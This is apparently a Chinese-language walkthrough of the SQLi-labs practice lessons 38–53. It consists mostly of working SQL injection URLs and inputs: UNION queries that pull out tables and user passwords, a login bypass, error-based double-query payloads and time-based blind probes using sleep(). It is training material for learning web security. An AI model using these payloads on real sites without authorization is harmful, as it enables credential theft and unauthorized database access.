Lesson – 38GET – Stacked Query Injection – String堆叠的查询
输入http://sql/Less-38/?id=1 ‘ 报错显示说“1” 后面多了一个单引号, 那么就上手吧。 “http://sql/Less-38/?id=1%27%20order%20by%203%23,按着步骤来,
http://sql/Less-38/?id=-1%20%27union%20select%201,2,database()%20%23爆出了security,then
http://sql/Less-38/?id=-1 ‘union select 1,2,table_name from information_schema.tables where table_schema=”security” limit 3,1 #爆出user 用这个爆出结果
http://sql/Less-38/?id=-1%20%27union%20select%201,2,concat_ws(0x3a,id,username,password)%20from%20users%20limit%200,1%23`
Lesson – 39GET – Stacked Query Injection – intiger based 这道题跟上面的差不多,直接套路来
http://sql/Less-39/?id=-1%20UNION%20SELECT%201,2,TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=%22security%22%20limit%203,1%23
Lesson – 40 GET – Blind Based – String – Stacked 盲注
http://sql/Less-40/?id=1%27%20and%20%271%27=%272
语句是SELECT * FROM users WHERE id=(‘-1′ ) union select 1,2,database() #’) LIMIT 0,1 后面自己干
http://sql/Less-40/?id=-1' ) union select 1,2,database() %23
Lesson – 41 GET – Blind Based – intiger – Stacked 盲注注入注入,还是没有单引号的,上手干呗
http://sql/Less-41/?id=-1 union select 1,2,table_name from information_schema.tables where table_schema="security" limit 3,1 %23
Lesson – 42 POST – Error based – String – stacked 表单注入
这里下面的两个点进去都没用,注入了下帐号发现也不行,审计下发现$username = mysqli_real_escape_string($con1, $_POST["login_user"]); $password = $_POST["login_password"];
对username转译(mysqli_multi_query函数)了,我们可以在password处输入“1’or 1=1 #”进行绕过,登录进去后发现更新密码功能 ,说明可以用password这里进行注入啊,多次尝试后发现这里用双注入查询才可以,这里放一个开头查询database的码,剩下的可以把最里面的查询语句进行替换哦,做还是可以做出来的就是太麻烦了password: -1' union select 1 from (select+count(*),concat(( database()),floor(rand(0)*2))a from information_schema.tables group by a)b #
Lesson – 43 POST – Error based – String – Stacked with twist
按着上面的继续,发现报错出现“ ‘)”,那么可以猜到后台的password周围是“ (‘password’)”,那么注入为“ 1′)or 1=1 # ” 那么剩下的就很简单了,跟上面的一样双注入吧爆出了column来-1')union select 1 from (select count(*),concat(( select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x656D61696C73 limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a)b #
Less – 44 Stacked Query blind 层次化查询 盲注 输入后发现未报错,只能慢慢尝试,在输入了0' union select 1,database(),3 or 1=1 #
后报出答案,然后 0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
显示出table_name剩下自己做。
Less – 45 POST – Error based – String – Stacked – Blind 盲注
跟上面的差不多,进行测试时发现用1')or 1=1 #
可以,也就是说password周围有“'( )’”,那么进行测试这里测一下库0') union select 1,database(),3 or 1=1 #
Less – 46 ORDER BY-Error-Numeric GET – 基于错误 – 数字型 – ORDER BY 从句后台代码是“ $sql = “SELECT * FROM users ORDER BY $id”;” 还有提示信息 Please input parameter as SORT with numeric value ,有了order by 就不能用union查询,那么尝试用布尔或时间注入判断http://sql/Less-46/?sort=1%20and%20(length(database()))%20=%208%20and%20if(1=1,%20sleep(5),%20null)
通过时间判断database()长度,太麻烦了直接跳过,感兴趣的自己做吧
Less – 47 ORDER BY Clause-Error-Single quote ORDER BY 从句 – 基于错误-单引号 输入
都一样的,先用时间盲注测试想要的基本信息http://sql/Less-47/?sort=1%27%20and%20if(1=1,%20sleep(1),%20null)%20and%20%271%27=%271
通过时间注入判断是否存在注入点,剩下的跟上面一样
Less – 48 ORDER BY Clause Blind based ORDER BY 从句 基于盲注
输入了单引号,未爆出任何信息http://sql/Less-48/?sort=1%27
试了好几次( ‘ ,’),”,”))发现,sort周围没有引号括号,那么直接上手http://sql/Less-48/?sort=1%20and%20if(1=1,sleep(1),null)
看出时间延长那么就可以确定了,剩下的自己手工检测吧。
Less – 49 ORDER BY Clause Blind based ORDER BY 从句 基于盲注
测试发现 参数加上双引号可以显示 ,那么就是周围有单引号,进行测试封闭单引号。http://sql/Less-49/?sort=1%27%20and%20if%20(1=1,sleep(1),null)%20and%20%271%27=%271
Less – 50 ORDER BY Clause Blind based:ORDER BY 从句 基于盲注
http://sql/Less-50/?sort=1%20and%20if(1=1,sleep(1),null),输入发现时间延长,那么测试成功?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
Less – 51 ORDER BY Clause Blind based:ORDER BY 从句 基于盲注,测试发现参数周围存在单引号,http://sql/Less-51/?sort=1%27%20and%20if(1=1,%20sleep(1),%20null)%20and%20%271%27=%271
Less – 52 ORDER BY Clause Blind based ORDER BY 从句 基于盲注,
测试发现参数周围没有符号,那么可以直接注入,?sort=1 and if(1=1, sleep(1), null)
Less – 53 ORDER BY Clause Blind based :ORDER BY 从句 基于盲注 通过“?sort=1″和?sort=1′ ”可以确定周围有单引号,剩下的自己做吧?sort=1' and if(1=1, sleep(1), null) and '1'='1